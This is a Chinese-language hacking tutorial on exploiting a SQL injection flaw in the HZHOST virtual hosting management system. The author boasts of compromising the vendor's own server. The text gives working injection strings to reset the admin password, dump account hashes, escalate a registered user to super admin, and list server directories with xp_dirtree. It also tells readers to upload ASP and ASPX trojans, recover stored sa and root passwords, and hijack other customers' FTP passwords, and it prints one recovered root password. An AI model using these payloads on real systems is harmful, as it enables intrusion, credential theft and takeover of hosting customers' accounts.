HZHOST域名虛擬主機管理系統(tǒng)sql注射漏洞+進一步利用.doc

這是一個域名主機實時管理系統(tǒng)。在百度搜索： title: (域名主機實時管理系統(tǒng)) ，會找到大量采用這種系統(tǒng)的網站！太術語了。就是在線開通ftp.sql.web的一個管理系統(tǒng)。一套web程序。和IIS管理程序。實現在線開通的玩 意。所以：我們可以免費申請域名和空間！哈哈！web程序方面寫的非常嚴謹。大量的過濾。由于是商業(yè)版的程序，所以我沒有源碼。本來是有的，但是放在家里的電腦上。放暑假時搞的shell現在都被刪了。我現在又比較懶，就沒去弄源代碼。反正大家知道怎么弄的就行了。這又是一個文本框的注射。我真不知道作者是怎么想的。其他地方都被過濾了。就留下域名管理這里沒過濾。官方放暑假的時候就被我搞了一遍，過了一個月他發(fā)現了。刪了我的shell。不知道他怎么知道我從那里下的手搞的他。他居然補了漏洞。先上圖，再說下利用方法。123 UPDATE memlst SET u_pss=e10adc3949ba59abbe56e057f20f883e WHERE u_nme=admin-這一句是把用戶admin的密碼修改為123456。管理員的后臺地址一般是/master或者直接在首頁登陸了按切換到管理員后臺。如果admin不是超級管理員，那就有三個辦法。一是自己構造語句爆出來。二是提升自己注冊的用戶的權限。三是直接爆網站路徑，再來個差異備份。第一個方法我給出一條示范語句：123 and (select top 1 isnull(cast(u_nme as nvarchar(4000),char(32)+char(94)+isnull(cast(U_pss as nvarchar(4000),char(32) from (select top 2u_nme,U_pss from hzhost.memlst where 1=1 order by u_nme) t order by u_nme desc )0- and 1=1可以同時爆出一個用戶的帳號和密碼。想爆出其他用戶的語句自己構造吧。第二個方法是：123 UPDATE memlst SET u_sys=6 WHERE u_nme=你注冊的用戶名-123 UPDATE memlst SET u_pwr=2 WHERE u_nme=你注冊的用戶名-這2句話就能夠提升自己為超級管理員第三個方法很麻煩。但是很有效果。直搗黃龍。很強大。我給出如下語句，大家自己研究去吧！爆路徑語句第一步：建立表123 ;drop table foofoofoo;create table foofoofoo(id int identity (1,1) not null,name nvarchar (300) not null,depth int not null,isfile nvarchar (50) null);- and 1=1第二步：123 ;declare z nvarchar(4000) set z=0x63003a005c00 insert foofoofoo execute master.xp_dirtree z,1,1- and 1=1注意：0x63003a005c00 = C: 為sql ENCODE其他的自己找工具去轉吧！第三步：暴出總數 123 and (select cast(count(*) as varchar(8000)+char(94) from foofoofoo)0- and 1=1第四步：暴出你想要的文件夾名字和文件名字 123 and 0(select top 1 cast(isfile as nvarchar(4000)+char(94)+cast(name as nvarchar(4000) from (select distinct top 1 * from foofoofoo order by isfile,name) t order by isfile desc,name desc)- and 1=1修改中間紅色的1，依次爆出。至于差異備份語句。讓nbsi3告訴你吧。對HZHOST域名虛擬主機管理系統(tǒng)sql注射漏洞進一步利用！我記得還有2篇關于hzhost的漏洞利用文章。名字不記得了。大家去搜索“hzhost漏洞”找找吧！里面提到下面兩點內容！1。是提到c:windowstemp下有hzhost主機留下的ftp登陸記錄。有用戶名和密碼2。是利用hzhost拿系統(tǒng)主機最高權限的。安裝了hzhost的主機,其mssql sa密碼,mysql root密碼還有serv-u的administrator密碼全部保存在注冊表中。位置在HKEY_LOCAL_MACHINEsoftwarehzhostconfigsettingsmysqlpassHKEY_LOCAL_MACHINEsoftwarehzhostconfigsettingsmastersvrpass經過了hzhost自己的加密方式，象eLVClO4tzsKBf#dee52443a3872cc159這樣的字符串。不過在hzhost后臺可以還原！拿到了sa密碼，或者root密碼，最高權限就在眼前！禁止了w.s的話。大家就傳aspx木馬導撒！我們傳了一個asp木馬上去后。在incsconstr.asp下面可以看到數據庫連接串。然后連接到數據庫。通過執(zhí)行SELECT * FROM hstlst語句?？梢钥吹胶芏嘀鳈C記錄。如圖發(fā)現什么沒有？h_ftppass的密碼和hzhost主機自己的加密串很相似。沒錯，主機管理的密碼也是經過他自己的加密方式加了密！而我們在主機管理的地方！看到明文密碼。說明他又給還原回來了。明白了么？我們先通過aspx木馬導出mysql，mssql的root,sa密碼加密串后。我們通過這條語句，修改別人的主機密碼。UPDATE hstlst SET h_ftppss=aPWw3j4zMaK83lHMBof9fc298b1d3d0a WHERE h_ID=10000471然后回過頭去看主機密碼。（這時候被轉成了明文）就拿到了root密碼為：sphil_070921注意：由于有多種限制。我截的